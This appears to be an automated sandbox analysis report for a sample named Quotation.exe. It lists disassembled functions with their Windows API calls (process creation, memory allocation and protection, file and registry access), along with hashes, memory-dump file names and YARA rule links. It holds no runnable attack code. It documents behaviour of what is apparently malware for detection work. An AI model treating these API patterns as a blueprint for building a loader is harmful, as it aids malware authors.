Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D

Function 004066B4 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
CloseHandle.KERNEL32(?), ref: 004066EA

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79

Function 004068F9 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15

Function 004069E9 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4

Function 00406926 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,?,00000000,00000000,00000000,00000000), ref: 0040693D

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4

Function 73C61A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(73C6501C,?,?,73C65034), ref: 73C61A68

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 079effaf9699c261382ffc22a019861d4cad119b71d3585fc313606484383f9f
Instruction ID: fa92a48ef7b0a550fe139c005557f6b65d6654218464db3be658fc7ed3c27cc6
Opcode Fuzzy Hash: 079effaf9699c261382ffc22a019861d4cad119b71d3585fc313606484383f9f
Instruction Fuzzy Hash: C9F098F291DB81EAC328EF5B94847053AE0A718345F30452EF79EDE341C330C9009B9A

Function 004062B6 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718

Function 004054C6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C

Function 004054E1 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000001,00405316), ref: 004054EF

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D

Function 73C62D14 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?), ref: 73C62DD3

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3720e32918e9b023efc9418a84ca8729d024a8a4d056bb2e9ad530249a36010e
Instruction ID: e8b273024344ea3966bc1ba74dae2fffe87f110f9140ad032b6dc8911bb7b75b
Opcode Fuzzy Hash: 3720e32918e9b023efc9418a84ca8729d024a8a4d056bb2e9ad530249a36010e
Instruction Fuzzy Hash: 3741A0B6904709EFEB00EF66DAC1B4D37B9EB48356F354029E608DE250DA35D840CBC2

Non-executed Functions

Function 004062E4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
wsprintfA.USER32 ref: 00406363
GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,?,007A4E88,?), ref: 0040639B
GlobalAlloc.KERNEL32(?,0000000A), ref: 004063AB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
GlobalFree.KERNEL32(00000000), ref: 0040640D
CloseHandle.KERNEL32(00000000), ref: 00406414

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Strings

%ls=%ls, xrefs: 00406359
[Rename], xrefs: 004063C3, 004063D2

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C

Function 00406D1B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406D90
CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DA4
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DBC

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
*?|<>/":, xrefs: 00406D7F

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-3572696228
Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9

Function 00405739 Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405756
GetSysColor.USER32 ref: 0040578F
SetTextColor.GDI32(?), ref: 004057A2
SetBkMode.GDI32(?,?), ref: 004057AE
GetSysColor.USER32(?), ref: 004057C2
SetBkColor.GDI32(?,?), ref: 004057D8
DeleteObject.GDI32(?), ref: 004057F4
CreateBrushIndirect.GDI32(?), ref: 004057FE

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

